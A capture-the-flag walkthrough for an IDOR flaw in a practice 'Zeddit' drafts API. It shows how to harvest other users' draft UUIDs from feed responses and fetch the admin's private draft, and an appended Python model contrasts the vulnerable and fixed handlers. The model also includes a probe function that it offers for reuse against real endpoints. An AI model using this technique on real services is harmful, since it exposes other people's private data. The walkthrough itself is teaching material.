hackr.gg — Zeddit — Saved Drafts Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only
Zeddit — Saved Drafts
IDOR & Access Control · Insecure Direct Object Reference (IDOR)
Difficulty: Beginner
Vuln class: Insecure Direct Object Reference (IDOR)
Steps: 3
// Objective
Access another user's private saved draft by manipulating the draft ID in the API.
// Tools required
Browser
Burp Suite
DevTools
// Step-by-step walkthrough
1
Create and view your own draft
Log in and save a post as a draft. Open DevTools → Network tab and find the API call that fetches it. Note the UUID in the request.
Command / Input
GET /api/drafts/a1b2c3d4-...
2
Enumerate other draft IDs
The draft IDs are UUIDs, so guessing or brute-forcing them is not practical; instead, look for places where the application leaks them. Check the "recent drafts" or shared posts endpoint responses for other users' draft IDs.
⚑ Look in the /api/feed or /api/posts/pending endpoint responses — other users' draft UUIDs may appear.
3
Access the admin draft
Use the leaked draft UUID to fetch the admin's private draft directly.
Command / Input
GET /api/drafts/ADMIN_DRAFT_UUID
Output
{"content":"HackrGG{z3dd1t_dr4ft_1d0r_4dm1n_l34k}","author":"admin"}
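The three steps above, as an added example that is not part of the hackr.gg walkthrough and not Zeddit's own code: a self-contained model of the drafts endpoint in which a feed response leaks draft UUIDs (step 2), a handler that only checks authentication hands back any draft by ID (step 3), and a fixed handler that adds the missing ownership check. The users, UUIDs, draft contents and feed body are all constructed for the example; the function names `extract_uuids`, `get_draft_vulnerable`, `get_draft_fixed` and `probe` are hypothetical.

```python
"""Added example (not from the hackr.gg page or the Zeddit application).
Models GET /api/drafts/<id> with an in-memory store to show the IDOR and its fix."""
import re

# Constructed sample data: users, IDs and contents are made up for this example.
ADMIN_DRAFT = "8f3c7d2e-5a41-4b6c-9e10-2d7f3c4a5b61"
MY_DRAFT = "a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d"
DRAFTS = {
    MY_DRAFT: {"author": "alice", "content": "my half-written post"},
    ADMIN_DRAFT: {"author": "admin", "content": "private admin draft (placeholder)"},
}

# Constructed feed response: a "pending posts" listing that includes other
# users' draft IDs, the kind of leak step 2 tells you to look for.
FEED_RESPONSE = (
    '{"items":[{"id":"' + ADMIN_DRAFT + '","status":"pending","author":"admin"},'
    '{"id":"' + MY_DRAFT + '","status":"pending","author":"alice"}]}'
)

# Matches any 8-4-4-4-12 hex UUID, regardless of version, so non-v4 IDs are not missed.
UUID_RE = re.compile(
    r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I
)


def extract_uuids(body):
    """Step 2: collect every UUID that appears in an API response body."""
    return sorted({m.group(0).lower() for m in UUID_RE.finditer(body)})


def get_draft_vulnerable(session_user, draft_id):
    """The endpoint as the walkthrough describes it: requires a logged-in
    session but never checks that the caller owns the draft."""
    if session_user is None:
        return 401, None
    draft = DRAFTS.get(draft_id)
    if draft is None:
        return 404, None
    return 200, draft


def get_draft_fixed(session_user, draft_id):
    """Same endpoint with the ownership check the vulnerable version lacks.
    A foreign draft gets 404 rather than 403 so the response does not
    confirm to the caller that the ID exists."""
    if session_user is None:
        return 401, None
    draft = DRAFTS.get(draft_id)
    if draft is None or draft["author"] != session_user:
        return 404, None
    return 200, draft


def probe(handler, session_user, candidate_ids):
    """Step 3 as a repeatable check: return the IDs for which the handler
    gives this user a draft that belongs to someone else."""
    leaked = []
    for draft_id in candidate_ids:
        status, draft = handler(session_user, draft_id)
        if status == 200 and draft["author"] != session_user:
            leaked.append(draft_id)
    return leaked


if __name__ == "__main__":
    ids = extract_uuids(FEED_RESPONSE)
    print("UUIDs leaked by feed:", ids)
    print("readable by alice (vulnerable):", probe(get_draft_vulnerable, "alice", ids))
    print("readable by alice (fixed):     ", probe(get_draft_fixed, "alice", ids))
```

Run as a script it lists the UUIDs pulled from the feed, then shows that the vulnerable handler returns the admin's draft to alice while the fixed handler returns nothing she does not own. The `probe` function is the reusable part: point it at any handler (or wrap a real HTTP call with the same `(status, body)` return shape) and feed it the IDs harvested from step 2.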
// Flag
Flag value
HackrGG{z3dd1t_dr4ft_1d0r_4dm1n_l34k}
Inside the admin's private draft, returned because the endpoint performs no authorization check: any logged-in user who knows the draft UUID can read it.